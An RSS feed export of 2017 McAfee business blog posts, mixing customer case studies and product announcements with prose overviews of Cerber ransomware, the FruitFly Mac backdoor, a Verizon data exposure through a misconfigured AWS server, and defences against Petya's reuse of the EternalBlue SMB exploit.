Interview with IS Director on Building a “Game Changing” Threat Defense Architecture https://securingtomorrow.mcafee.com/business/interview-director-building-game-changing-threat-defense-architecture/ https://securingtomorrow.mcafee.com/business/interview-director-building-game-changing-threat-defense-architecture/#respond Fri, 11 Aug 2017 14:00:24 +0000 https://securingtomorrow.mcafee.com/?p=76898 Director of Information Security Simon Brown oversees information security for the Liquor Control Board of Ontario (LCBO), one of the world’s largest retailers of beverage alcohol. LCBO operates 650 brick-and-mortar retail stores plus ecommerce and mobile storefronts across the Canadian province. The adaptable threat defense infrastructure that Brown and his very small IS team have […]

The post Interview with IS Director on Building a “Game Changing” Threat Defense Architecture appeared first on McAfee Blogs.

]]>
Director of Information Security Simon Brown oversees information security for the Liquor Control Board of Ontario (LCBO), one of the world’s largest retailers of beverage alcohol. LCBO operates 650 brick-and-mortar retail stores plus ecommerce and mobile storefronts across the Canadian province. The adaptable threat defense infrastructure that Brown and his very small IS team have built enables them to manage security with minimal resources and to find and respond to cyberthreats in minutes across LCBO’s extended enterprise

Why did you move from a managed service provider (MSP) model to an infrastructure based primarily on McAfee solutions?

We came to the realization that we could get more value with our own high-quality staff and the right tools. Plus, we would no longer have to rely on external businesses that will never know our business as well as we do. …We had used McAfee endpoint protection and the McAfee ePO™ central console but we didn’t seriously consider McAfee ePO as a means of managing other enterprise security solutions until our new CIO’s push for standardization. Because of the McAfee integrated security platform—the way all its solutions work together and enhance each other—it made total sense to leverage our existing McAfee endpoint environment and McAfee ePO.

How did you strategically roll out the various McAfee solutions?

The first thing we did was consolidate our five instances of McAfee ePO into one production console and one quality assurance console. Then, because our legacy SIEM was being obsoleted, we deployed McAfee Enterprise Security Manager and other components of the McAfee SIEM. We decided out of the gate that we would obtain the best value out of McAfee Threat Intelligence Exchange, McAfee Advanced Threat Defense (ATD), and McAfee Endpoint Threat Defense and Response. It didn’t make sense to deploy these solutions without McAfee Endpoint Security in place so we rolled it out after the SIEM and then layered in the other solutions.

What do you appreciate most about McAfee Endpoint Security (ENS). Do you have any advice for those considering migration to McAfee ENS?

Across the majority of our 6,000 endpoints, we migrated [McAfee VirusScan® Enterprise] to McAfee ENS version 10.5, including the cloud-based Real Protect machine learning functionality and Dynamic Application Containment (DAC). We especially appreciate DAC. Knowing that any file that is not already tagged as trusted will be contained before it can cause damage gives me considerable peace of mind.

When you migrate from [McAfee VirusScan Enterprise], it is important to spend time up front to ensure you migrate rule sets from ‘like to like,’ but the benefits of migrating to McAfee ENS far outweigh any work required to make the transition.

With everything integrated, we can manage our entire security infrastructure from two to three panes of glass instead of six or seven. Less things to see, less things to miss…and the ability to recover from an attack in minutes to an hour, rather than days or weeks, just can’t be overstated.”

—Simon Brown, Director of Information Security, LCBO

How about McAfee Endpoint Threat Defense and Response, which you deployed across all your back-office and point-of-service servers and production desktops?

With McAfee Active Response [functionality in McAfee Endpoint Threat Defense and Response], we can quickly and easily search for hashes, filenames, IP addresses…You name it, we go find it. Finding suspicious files fast reduces the time needed to respond appropriately and shrinks the window of vulnerability.

…In the [McAfee] Active Response workspace, we can view a list of all potential threats or of high-risk threats or threat timelines. We can click on an executable or other suspicious file, drill down to discover where it is installed, see what it is doing to its host system, and get a full read-out of its behavior. We can then click to take action, such as mark the file as known trusted or known malicious, or end or delete the process, for that one system or companywide—all from one console. It really is remarkable.

Please walk us through a typical potential threat scenario now that you have this integrated threat defense.

As soon as a potentially malicious file has been detected—for example, from an endpoint or IPS—and sent to McAfee ATD, we receive an alert from our McAfee SIEM. McAfee ATD gives us a better idea of the nature of the hash value or file name that is tripping the alert. Then we search using McAfee Endpoint Threat Defense and Response or McAfee Threat Intelligence Exchange to find out where the file exists, on which endpoint…Within minutes after being alerted, either by the SIEM or an email, we can ascertain whether the threat has been dealt with, and, if not, take appropriate action.

That we can now quickly see exactly where an infection exists within our entire environment and, if we want to, within minutes remove it—not only from that endpoint but from every single endpoint in our network—is a game changer. We simply couldn’t do anything like that before; it would have taken much longer to find the executable and remove it throughout the environment.

What other products are you in the process of adding to your infrastructure?

We are in the process of rolling out McAfee Web Gateway and McAfee Database Event Monitor for SIEM. The former will offload some of the web filtering load from our IPSs and enable suspicious files entering via the web to be sent directly to McAfee ATD for analysis. McAfee Database Activity Monitoring will watch key databases for out-of-the-ordinary activity and help combat “permissions creep.”

In sum, what are the main benefits of the McAfee integrated security platform for LCBO?

Ultimately, the main benefits of the McAfee ecosystem are integration and speed to recovery, which is itself a byproduct of integration. With everything integrated, we can manage our entire security infrastructure from two to three panes of glass instead of six or seven. Less things to see, less things to miss…and the ability to recover from an attack in minutes to an hour, rather than days or weeks, just can’t be overstated.

 

To read the LCBO case study, click here. Get your questions answered by tweeting @McAfee_Business.

The post Interview with IS Director on Building a “Game Changing” Threat Defense Architecture appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/interview-director-building-game-changing-threat-defense-architecture/feed/ 0
Cerber Ransomware Is Now Capable of Stealing Browser Passwords, Bitcoin Wallet Data https://securingtomorrow.mcafee.com/business/cerber-ransomware-now-capable-stealing-browser-passwords-bitcoin-wallet-data/ https://securingtomorrow.mcafee.com/business/cerber-ransomware-now-capable-stealing-browser-passwords-bitcoin-wallet-data/#respond Thu, 10 Aug 2017 18:32:07 +0000 https://securingtomorrow.mcafee.com/?p=76890 Adam Wosotowsky contributed to the blog. Threats are evolving, especially ransomware. Cerber ransomware, one of the most powerful strains out there, is no exception. The threat used to be a pretty run-of-the-mill ransomware, infecting devices through various social engineering techniques and encrypting files on an infected computer and demanding a ransom to restore them, but now, […]

The post Cerber Ransomware Is Now Capable of Stealing Browser Passwords, Bitcoin Wallet Data appeared first on McAfee Blogs.

]]>
Adam Wosotowsky contributed to the blog.

Threats are evolving, especially ransomware. Cerber ransomware, one of the most powerful strains out there, is no exception. The threat used to be a pretty run-of-the-mill ransomware, infecting devices through various social engineering techniques and encrypting files on an infected computer and demanding a ransom to restore them, but now, a new variant of Cerber has emerged that is even more advanced. In addition to its existing capabilities, the malware now has the ability to steal Bitcoin wallet data and stored browser password information.

Cerber ransomware has developed rapidly over the past few years. Building off of its initial capabilities, the threat soon developed the ability to evade detection by cybersecurity tools, then was sold ‘as-a-service’ to low-level hackers who want to make a quick buck from ransomware – with the authors taking a share of every single ransom payment. Plus, to make matters worse, the ransomware uses very strong encryption. Now, Cerber has found yet another way to make profit by stealing cryptocurrency directly from a Bitcoin wallet, as well as swooping additional password information.

While this is an escalation of the attacker’s capability, there are some holes in the implementation that may prevent them from fully accessing the wallet. However, it’s important to note, Cerber deletes a Bitcoin wallet before the ransomware even encrypts files, so paying the ransom won’t get the wallet back.

The next question is: what can users do to stay protected? First, remember there has never been a security incident with the Bitcoin block chain itself; all the “bitcoin hacks” so far have taken advantage of security holes in the websites that handle bitcoin management and not the blockchain itself.

For bitcoin users, it’s crucial to never put all your coins in one place. Someone who wants to protect their assets should have separate active and savings bitcoin wallets where the active wallet can be managed by an online bitcoin service that can handle spending the coins, and the savings wallet is kept separate from online services. If you have such a savings wallet, you should keep hardcopies somewhere. This way, if a Cerber infection downloads and deletes your wallet you only need to take your backup savings wallet and send all the money to a new wallet that the Cerber attackers don’t have.

And since Cerber itself uses email attachments as an attack vector, the attack could also be prevented by having a corporate mail policy which blocks any executable attachments, even if they are in zip files. If the attack payload is a Word document or pdf attachment with a macro downloader then you will need to rely on AV and good judgement.

Beyond that, always practice good security hygiene. This means avoid opening documents and attachments from unfamiliar sources and changing all passwords to be unique and complex.

To learn more about this ransomware attack and others like, follow us at @McAfee and @McAfee_Business.

The post Cerber Ransomware Is Now Capable of Stealing Browser Passwords, Bitcoin Wallet Data appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cerber-ransomware-now-capable-stealing-browser-passwords-bitcoin-wallet-data/feed/ 0
New Surveillance Malware “FruitFly” Is a Nearly Undetectable Mac Backdoor https://securingtomorrow.mcafee.com/business/new-surveillance-malware-fruitfly-nearly-undetectable-mac-backdoor/ https://securingtomorrow.mcafee.com/business/new-surveillance-malware-fruitfly-nearly-undetectable-mac-backdoor/#respond Thu, 03 Aug 2017 20:00:29 +0000 https://securingtomorrow.mcafee.com/?p=76711 Charles McFarland contributed to this blog Mac malware outbreaks used to be viewed as a rarity. However, the last few years have seen Mac-focused threats steadily on the rise. In fact, our McAfee Labs Quarterly Threats Report showed instances of Mac malware growing by a huge 744% in 2016. Fast forward to the summer of […]

The post New Surveillance Malware “FruitFly” Is a Nearly Undetectable Mac Backdoor appeared first on McAfee Blogs.

]]>
Charles McFarland contributed to this blog

Mac malware outbreaks used to be viewed as a rarity. However, the last few years have seen Mac-focused threats steadily on the rise. In fact, our McAfee Labs Quarterly Threats Report showed instances of Mac malware growing by a huge 744% in 2016. Fast forward to the summer of 2017, and a new and powerful strain of Mac malware has hit the scene. Named FruitFly, the threat has only recently been detected by researchers, despite being around for years. The malware is highly-invasive and capable of taking complete control of an infected Mac.

FruitFly malware works as a traditional RAT (remote access trojan). Once it infects a Mac, this RAT creates a backdoor and helps the attacker control the infected device through the Command and Control server (C&C or C2) by sending its system commands. These commands include taking screenshots of the display, remotely switching on the webcam, and modifying files. What’s more — later versions of FruitFly seem to have the ability to control mouse movements and interactions with the infected machine.

Though powerful, FruitFly is primarily old fashioned. It partially utilizes the Perl programming language, which is not commonly used anymore. Additionally, the open source libjpeg code, which enables programmers to handle the JPEG image format, can also be found in FruitFly malware samples dating back to at least 1998. This all suggests the programmers have been around for some time.

Who has been impacted by FruitFly so far? Fortunately, only a small number of users are known to have been targeted by both old and new variants. Biomedical personnel were the main target of the first variant and users at home were the target of the later variant. However, smaller, tailored FruitFly campaigns may continue to persist for a while, which means all Mac users need to be vigilant. Additionally, much of the code written for FruitFly is cross platform, meaning that it can also run on Linux. While the current version does not run fully on Linux, there are only a few necessary changes to make it viable. This suggests a Linux variant may exist or is planned.

The good news is there are a few things users can do to stay protected from FruitFly. First off, users can protect against older variants just by updating a Mac to include the latest patch. Newer variants still require detection and prevention, which means users need to run up-to-date security products.

For McAfee customers – our solutions detect both the dropper and the sample itself from the both old and new variants. The latter is detected using our cloud technology Artemis.

To learn more about this attack and Mac malware, follow us at @McAfee and @McAfee_Business

The post New Surveillance Malware “FruitFly” Is a Nearly Undetectable Mac Backdoor appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/new-surveillance-malware-fruitfly-nearly-undetectable-mac-backdoor/feed/ 0
City Proactively Blocks More Threats with Less Work, Saves 40 Hours Weekly with McAfee ENS https://securingtomorrow.mcafee.com/business/city-proactively-blocks-threats-less-work-saves-40-hours-weekly-mcafee-ens/ https://securingtomorrow.mcafee.com/business/city-proactively-blocks-threats-less-work-saves-40-hours-weekly-mcafee-ens/#respond Thu, 27 Jul 2017 14:00:47 +0000 https://securingtomorrow.mcafee.com/?p=76150 The information security team for the City of Gothenburg, in a Swedish metropolitan area of 1.1 million people, felt the impact of migrating to McAfee Endpoint Security almost immediately. First and foremost, the dramatic increase in the City’s ability to detect and protect against malware saved the team a lot of time. “We saw a […]

The post City Proactively Blocks More Threats with Less Work, Saves 40 Hours Weekly with McAfee ENS appeared first on McAfee Blogs.

]]>
The information security team for the City of Gothenburg, in a Swedish metropolitan area of 1.1 million people, felt the impact of migrating to McAfee Endpoint Security almost immediately. First and foremost, the dramatic increase in the City’s ability to detect and protect against malware saved the team a lot of time.

“We saw a sudden reduction in infections and we had much better control over our web environment thanks to the McAfee ENS Web Control module,” recalls Kenneth Hamilton, an expert system specialist who manages endpoint protection from within the City’s Security Operations Center. “ENS began blocking users from downloading suspect files off the Internet. By reducing time spent remediating after infections, we probably save 40 hours per week.”

I can find only benefits from migrating to [McAfee] ENS, despite my searching for downsides. The new functionality, improved performance, and advanced protection make migration a no-brainer in my opinion. Plus migration was easy and painless.”

In addition, says Hamilton, McAfee ENS made his job much easier. “The modular architecture and fact that there is only one agent instead of multiple agents on the endpoint simplifies administration,” he explains.

“The ENS GUI is also more user-friendly, simple to understand and use, and offers more administrative support tools,” he adds. Because creating rules is so much easier with McAfee ENS, Hamilton decided to create them from scratch rather than porting them from the legacy solution.

Gothenburg City also experienced improved CPU performance from the start. Since anti-malware scans use less memory, are so much faster, and occur in the background, the City’s business users are happier, which makes the security team happier. Since deploying McAfee ENS, the City’s help desk receives only one to two calls a week—out of 35,000 users.

Hamilton sees no reason not to migrate from McAfee VirusScan Enterprise to McAfee ENS as soon as possible. “I can find only benefits from migrating to ENS, despite my searching for downsides,” he says. “The new functionality, improved performance, and advanced protection make migration a no-brainer in my opinion. Plus migration was easy and painless.”

Painless Migration from McAfee VirusScan Enterprise

Gothenburg migrated 35,000 desktops across all city departments to McAfee ENS. Most of the nodes migrated from McAfee VirusScan Enterprise to the McAfee ENS Threat Prevention module and added the ENS Web Control module. Some desktops also received the ENS firewall module, which provides improved Host Intrusion Prevention (HIPS). Migration of all 43 departments took one month from start to finish, including one week of planning and communications.

“We had been afraid that users would complain that the migration to ENS was hindering them or slowing down their computers, but only two people out of 35,000 complained—about not being able to access an unapproved website,” says Hamilton. “It was a pain-free installation all around.”

Protecting Both Physical and Virtual Endpoints

Using the McAfee ePolicy Orchestrator® (ePO™) central console, Hamilton can apply the same policies across endpoints, whether physical or virtual. Incorporating eight hypervisors, the City’s implementation of McAfee Management for Optimized Virtual Environments (MOVE) Antivirus protects 900 virtual servers, some with agents and others without, across two data centers. These servers manage a wide range of applications spanning city departments. Hamilton is also piloting using McAfee ENS in the City’s virtualized environment and has been pleased with initial results.

With both physical and virtual endpoints managed from ePO and superior protection from McAfee ENS, the City of Gothenburg is proactively blocking ransomware and other threats with less work. Since additional security components such as McAfee Threat Intelligence Exchange and McAfee Advanced Threat Defense (ATD) can easily be managed from that same ePO console, and since endpoint protection is now able to leverage the McAfee Data Exchange Layer (DXL), the City of Gothenburg has truly laid the foundation for a robust, adaptive, threat defense lifecycle that safeguards city operations and citizens’ data.

 

To read the City of Gothenburg full case study, click here. Get your questions answered by tweeting @McAfee_Business.

The post City Proactively Blocks More Threats with Less Work, Saves 40 Hours Weekly with McAfee ENS appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/city-proactively-blocks-threats-less-work-saves-40-hours-weekly-mcafee-ens/feed/ 0
OpenDXL.com goes live! Join the movement. https://securingtomorrow.mcafee.com/business/opendxl-com-goes-live-join-the-movement/ https://securingtomorrow.mcafee.com/business/opendxl-com-goes-live-join-the-movement/#respond Wed, 26 Jul 2017 04:02:53 +0000 https://securingtomorrow.mcafee.com/?p=76301 This blog was written by Barbara Kay. Please help us celebrate the birth of the newest dedicated open source project site: OpenDXL.com. As the focal point for the OpenDXL community, it provides a forum for developers and enterprises to exchange ideas, get help and contribute suggestions, share and research integrations, and find training and other […]

The post OpenDXL.com goes live! Join the movement. appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

Please help us celebrate the birth of the newest dedicated open source project site: OpenDXL.com. As the focal point for the OpenDXL community, it provides a forum for developers and enterprises to exchange ideas, get help and contribute suggestions, share and research integrations, and find training and other resources. When you want to imagine, discover, build, deploy, or discuss services for the Data Exchange Layer (DXL) communications fabric, it has everything you want.

This site is for developers, integrators, and fans of OpenDXL. It features more than 30 new integrations from individuals and commercial software vendors. There’s a developer’s guide, a submission guide, and a cool bootstrapper utility (to make easy integration even easier). Please visit to:

  • Read and research.
  • Contribute ideas, comments, and answers.
  • Submit a new integration.
  • Connect with members.

And OpenDXL.com is just getting started. Next, the team will launch a competition for a new logo – you can weigh in on the ones a professional design team created, or up the stakes by contributing your own. And you will want to visit often. Every week, more integrations will be posted – perhaps you can publish yours or use one instead of writing your own. Tip: Be sure to check for new wrappers, they seem to be sprouting for every API.

OpenDXL is the easy and open way for the industry to integrate data and actions for real-time security operations. OpenDXL.com contains the list of solutions regardless of where they are hosted. It complements github.com/opendxl, where the OpenDXL open source code and solution code repositories live. Visit and say “happy birthday!” to www.opendxl.com.

The post OpenDXL.com goes live! Join the movement. appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/opendxl-com-goes-live-join-the-movement/feed/ 0
News from Black Hat: Humans Collaborate and Team with Machines to Work Smarter https://securingtomorrow.mcafee.com/business/news-black-hat-humans-collaborate-team-machines-work-smarter/ https://securingtomorrow.mcafee.com/business/news-black-hat-humans-collaborate-team-machines-work-smarter/#respond Wed, 26 Jul 2017 04:02:08 +0000 https://securingtomorrow.mcafee.com/?p=76305 This blog was written by Barbara Kay. Work smarter, not harder. I’ve always liked that mantra (I told my mom I wasn’t procrastinating: I was planning!), and this approach is especially needed in security operations. Today at Black Hat, McAfee announced a wealth of ways we are helping analysts and administrators get more value out […]

The post News from Black Hat: Humans Collaborate and Team with Machines to Work Smarter appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

Work smarter, not harder. I’ve always liked that mantra (I told my mom I wasn’t procrastinating: I was planning!), and this approach is especially needed in security operations. Today at Black Hat, McAfee announced a wealth of ways we are helping analysts and administrators get more value out of their investments, both in technology and in operating approaches.

“Human-machine teaming” is the core concept. It represents a responsible place in the continuum between fully automated and fully manual processes. In truth, there are no totally automated or totally manual processes. The most fully automated example is a countermeasure permitted to make decisions without a human in the loop. We allow this action after people have defined the scope and impact of the system’s decisions, and we have confidence that machines can implement these steps reliably and consistently. I think of this as empowered automation.

The best “fully manual” examples might be threat hunters and security architects, who use tools to facilitate free-form processes and enrich decisions informed by experience. These experts use machines surgically and thoughtfully, driving the right applications of automation while respecting the unique contribution and value of the individuals.

In the threat hunter report released today, “Disrupting Disruptors” we found that the most advanced organizations use a balance of manual and automated processes, and are twice as likely to automate investigation processes as less mature organizations. This is human-machine teaming in action.

McAfee product innovations are helping organizations move up the maturity curve with more machine learning, automated analytics, and better information access and visualizations for the humans who need to make decisions. Through OpenDXL.com and new industry partnerships, we’ve also improved the options for humans to work together, ensuring the most creative and effective uses of machines in the cybersecurity fight.

Highlights:

  • Enhanced Machine Learning Malware Detection: The newly released McAfee Advanced Threat Defense (ATD) 0 introduces an innovative deep learning technique to enhance malware analysis, resulting in an expanded ability to identify malicious markers that may be hidden, or not fully executed.
  • Expanded, Closed-Loop Detection-to-Protection for Email: McAfee ATD Email Connector now enables email security gateways to forward suspicious attachments to McAfee ATD for analysis, preventing malware from spreading on internal networks.
  • Integrated Cloud Threat Detection: New integration between McAfee Cloud Threat Detection (CTD) and McAfee Threat Intelligence Exchange (TIE) enables McAfee Endpoint Security (ENS) to easily forward suspicious samples to a cloud sandbox for in-depth analysis.
  • Accurate Insight into Exposure and Risk, including Office 365: McAfee Enterprise Security Manager 10.1, our updated SIEM solution, now improves risk assessment by factoring in active, relevant countermeasures and priority guidance, providing a more accurate understanding of exposure and potential impact. The new Asset Threat Risk Content Pack 2.0 feature delivers security configuration, compliance posture and patch assessment in a single view. Easy incorporation of Microsoft Office 365 actions and events enables monitoring and analysis of user activity within cloud services.
  • Rapid SOC Use Case Deployment: The new McAfee Connect content portal simplifies access to freely available, simple to deploy use cases and solution integrations for use with McAfee Enterprise Security Manager. Through the portal, McAfee customers can find tools to activate monitoring, detection and incident management tasks, including user behavior analysis and detection of malware exploits and reconnaissance.
  • Simplified, faster, estate-wide Data Loss Prevention: McAfee Data Loss Prevention (DLP) Endpoint, DLP Prevent, DLP Discover and DLP Monitor are now fully unified. Unified policy management builds upon a common classification engine, dictionaries, regex engine and syntax. Streamlined incident and case management speeds investigation and remediation of risk or suspicious user behavior and common file, email, web traffic and database analysis across endpoint and network DLP ensures consistent enforcement of corporate data usage policies.
  • New, independent open source community, OpenDXL.comA forum, app marketplace, and new utilities and developer resources encourage enterprises, developers, and integrators to take advantage of the speed and simplicity of OpenDXL integrations and the Data Exchange Layer (DXL) communication fabric.
  • 14 New Security Innovation Alliance partnersMcAfee is proud to welcome more of today’s and tomorrow’s industry leaders to our partnership program, including representatives of the network, monitoring, analytics, and orchestration markets.

 

AGAT Software

Cisco Systems

Extreme Networks

Gigamon

HPE

Identiv

Juniper Networks

Kemp Technologies

Lumeta

Resolve Systems

Siemplify

SkyFormation

 

Read the press release, visit us in Booth 300 at Black Hat, and learn more about human-machine teaming here.

 

The post News from Black Hat: Humans Collaborate and Team with Machines to Work Smarter appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/news-black-hat-humans-collaborate-team-machines-work-smarter/feed/ 0
McAfee MOVE AntiVirus Multiplatform Deployment Just Got a Lot Easier https://securingtomorrow.mcafee.com/business/cloud-security/mcafee-move-antivirus-multiplatform-deployment-just-got-lot-easier/ https://securingtomorrow.mcafee.com/business/cloud-security/mcafee-move-antivirus-multiplatform-deployment-just-got-lot-easier/#respond Fri, 21 Jul 2017 00:53:55 +0000 https://securingtomorrow.mcafee.com/?p=76045 This blog post was written by Teresa Wingfield. McAfee Management for Optimized Virtual Environments AntiVirus (McAfee MOVE AntiVirus) optimizes security for virtual desktops and servers. Version 4.6 became available on July 18, 2017. One of the major enhancements offered by this release is dramatic simplification of the multiplatform deployment process. McAfee MOVE AntiVirus 4.6 automates […]

The post McAfee MOVE AntiVirus Multiplatform Deployment Just Got a Lot Easier appeared first on McAfee Blogs.

]]>
This blog post was written by Teresa Wingfield.

McAfee Management for Optimized Virtual Environments AntiVirus (McAfee MOVE AntiVirus) optimizes security for virtual desktops and servers. Version 4.6 became available on July 18, 2017. One of the major enhancements offered by this release is dramatic simplification of the multiplatform deployment process. McAfee MOVE AntiVirus 4.6 automates the deployment of the Security Virtual Machine (SVM) Manager, SVM and clients, reducing manual clicks by 70%!

Here’s a quick walk through of the new streamlined deployment steps:

Step 1:  There’s now just one click installation of software extensions and product packages required so that you can install McAfee MOVE AntiVirus components on McAfee ePolicy Orchestrator (McAfee ePO) or deploy them to virtual systems. No more separate downloads.

Step 2:  Like in previous versions of  McAfee MOVE AntiVirus, you register your VMware vCenter account with McAfee ePO.

Step 3: Configuration and deployment of the SVM Manager is now consolidated into one step using a single Meta Package.

Step 4:  You review your McAfee MOVE AntiVirus deployment status.

Step 5:  Next, you deploy the McAfee MOVE AntiVirus client. The McAfee MOVE AntiVirus client will automatically run the European Institute for Computer Antivirus Research (EICAR) test.  This means that you no longer need to log into the MOVE client and the MOVE SVM to check connection status and that you don’t need to run separate EICAR tests.

Step 6:  The SVM deployment will start automatically. Deployment of SVM load balancing is also automatic.

Error codes for all six steps are now automatically generated and displayed in the status during installation to make diagnosing issues much easier.

Learn More

McAfee MOVE AntiVirus 4.6 includes a number of additional enhancements, including the ability to block more threats in multiplatform deployments with improved threat intelligence. Check out the release notes for more details.

The post McAfee MOVE AntiVirus Multiplatform Deployment Just Got a Lot Easier appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/mcafee-move-antivirus-multiplatform-deployment-just-got-lot-easier/feed/ 0
How a Misconfigured AWS Server Exposed Verizon Customers’ Data https://securingtomorrow.mcafee.com/business/misconfigured-aws-server-exposed-verizon-customers-data/ https://securingtomorrow.mcafee.com/business/misconfigured-aws-server-exposed-verizon-customers-data/#respond Tue, 18 Jul 2017 15:00:16 +0000 https://securingtomorrow.mcafee.com/?p=76093 When there’s a technical issue, telecom customers often call a support line and ask for assistance, providing personal information when necessary to resolve the problem. However, what customers don’t know is that the personal data they share over the phone could be potentially susceptible to a cyberattack, depending on where it’s stored after the call […]

The post How a Misconfigured AWS Server Exposed Verizon Customers’ Data appeared first on McAfee Blogs.

]]>
When there’s a technical issue, telecom customers often call a support line and ask for assistance, providing personal information when necessary to resolve the problem. However, what customers don’t know is that the personal data they share over the phone could be potentially susceptible to a cyberattack, depending on where it’s stored after the call is done. Verizon customers are now dealing with exactly this, as it’s been discovered that a misconfigured AWS server has exposed customer data that was recorded during support calls.

This data, which is from support calls that have occurred in the past six months, includes the names, street and email addresses, phone numbers, and account PINs of over 14 million Verizon customers. Out of all of this data, exposed PIN numbers are the most concerning, since these PINs can give cybercriminals direct access to a customer’s account – and potentially access to individual phone accounts which could be used to compromise two-factor authentication.

So, how exactly was this security gap created? A basic setting, access control, was not applied to the cloud instance in AWS, essentially leaving the data out in the open. Encryption should also have been applied to the storage volume within AWS. This server was operated by a third-party vendor called Nice Systems, who managed Verizon’s customer service operations. In this situation, Verizon wasn’t fully aware of the security gaps present in cloud infrastructure containing their customer data.

That’s why it’s important organizations use a cloud workload protection solution, they can discover workloads in the cloud they don’t know about (as long as they have overarching account credentials), immediately see their security settings, and use that information to apply new policy where necessary. If a cloud workload protection solution was in place, Verizon could have required that Nice Systems adjust security settings, as well as provide the telecom with an audit report of the cloud servers that hold their data, allowing them to take any security action necessary.

It’s important for companies using cloud services, like AWS, to remember that they aren’t exempt from applying security to their own infrastructure. It’s a shared responsibility, which Amazon outlines here

This shared responsibility and the relationships organizations have with third-party vendors are especially important to keep top of mind as regulators begin passing legislation that imposes specific data privacy requirements for companies, such as the E.U.’s General Data Protection Regulation (GDPR). If a company stores any data on European citizens in the cloud, it should ask those providers specific questions to help ensure they comply and, of course, do so consistently using a cloud workload protection solution.

For more information on this incident and others like it, follow us at @McAfee and @McAfee_Business.

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, and is for information purposes only and it does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit promise or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

The post How a Misconfigured AWS Server Exposed Verizon Customers’ Data appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/misconfigured-aws-server-exposed-verizon-customers-data/feed/ 0
Preventing the Next Petya: Block New Exploits by Defending Old Vulnerabilities https://securingtomorrow.mcafee.com/business/preventing-next-petya-block-new-exploits-defending-old-vulnerabilities/ https://securingtomorrow.mcafee.com/business/preventing-next-petya-block-new-exploits-defending-old-vulnerabilities/#respond Mon, 17 Jul 2017 20:41:46 +0000 https://securingtomorrow.mcafee.com/?p=76063 This blog was written by Nat Smith. For ransomware enthusiasts, the April release of stolen NSA Windows exploits is a gift that will not stop giving. Just weeks after the Shadowbrokers’ “Lost in Translation” file drop, WannaCry brought havoc and destruction to networks worldwide. Now a new Petya variant is using the same EternalBlue exploit—plus […]

The post Preventing the Next Petya: Block New Exploits by Defending Old Vulnerabilities appeared first on McAfee Blogs.

]]>
This blog was written by Nat Smith.

For ransomware enthusiasts, the April release of stolen NSA Windows exploits is a gift that will not stop giving. Just weeks after the Shadowbrokers’ “Lost in Translation” file drop, WannaCry brought havoc and destruction to networks worldwide. Now a new Petya variant is using the same EternalBlue exploit—plus some newly weaponized Windows admin tools—to ransack local subnets. Like WannaCry, it encrypts the files on a compromised system, but then it encrypts the master boot record as well, rendering the machine useless. Analysts are still debating New Petya’s origin and intent, but there is complete consensus on one point: there will be more EternalBlue-enabled ransom attacks, and soon. By some estimates up to a million older Windows servers remain unpatched for the EternalBlue SMBv1 vulnerability.

One positive takeaway is that there is really no reason to panic. We already have the tools to defeat the next Petya, and the next anything else, because most new threats target a very small number of vulnerabilities, most of them known. According to Gartner’s Craig Lawson, 431,000,000 net-new malware samples were identified in 2015.[1] Yet all of that year’s major ransomware attacks targeted just 36 vulnerabilities. When new threats recycle old exploits, we have the tools to defeat them. Consider two examples.

Vulnerability-based signatures Unlike exploit-based signatures used by many firewalls, that attempt to identify the fingerprint of a known attack, vulnerability-based signatures look for behaviors that indicate a known vulnerability is being exploited. To block all the new ransomware variants in 2016, you would need 357,000,000 exploit-based signatures. To block all those same ransomware attacks on known vulnerabilities, you would use only 126 vulnerability-based signatures.  That is why the overwhelming majority of McAfee Network Security Platform signatures are vulnerability-based and have been for more than 15 years.

Network Security Platform currently already had six vulnerability-based signatures that allowed it to detect and prevent Petya the day it was released as well as any new attack that tries to exploit the same vulnerabilities. Network Security Platform customers were protected without having to scramble and upload the latest signature file from the vendor. These vulnerabilities include:

  • 0x43c0b800- NETBIOS-SS: Windows SMBv1 identical MID and FID type confusion vulnerability (CVE-2017-0143)
  • 0x43c0b400- NETBIOS-SS: Windows SMB Remote Code Execution Vulnerability (CVE-2017-0144)
  • 0x43c0b500- NETBIOS-SS: Windows SMB Remote Code Execution Vulnerability (CVE-2017-0145)
  • 0x43c0b300- NETBIOS-SS: Microsoft Windows SMB Out of bound Write Vulnerability (CVE-2017-0146)
  • 0x43c0b900- NETBIOS-SS: Windows SMBv1 information disclosure vulnerability (CVE-2017-0147)
  • 0x451e3300- HTTP: Microsoft Office OLE Arbitrary Code Execution Vulnerability (CVE-2017-0199)

Application controls for servers – Host-based application controls use various methods to regulate the services and processes that are allowed to execute on a workload or server. McAfee Application Control enforces three such methods: whitelists (of applications and approved updaters), reputation, and sandbox verification of safety. On a server secured with McAfee Application Control, the Petya malware payload or a variant, a Windows DLL, would be immediately shut down the moment it tried to launch, with no impact to the workload’s availability or performance. Again, McAfee Application Control customers would not have been compromised by Petya even if they were the first target. Instead of trying to protect against every new variant of malware that may present itself, security focuses what is supposed to run.

It is not that hard to block new exploits on known vulnerabilities. Patch the ones that are under attack. Do it NOW; there are not that many. Put IDS/IPS on your networks. Not just at the perimeter, but on the inside to protect your virtualized workloads, where it can see your east-west traffic. Put application control on your servers to smother and starve any malware that evades your other defenses.

Don’t be the deer in the headlights. You’ve got this!

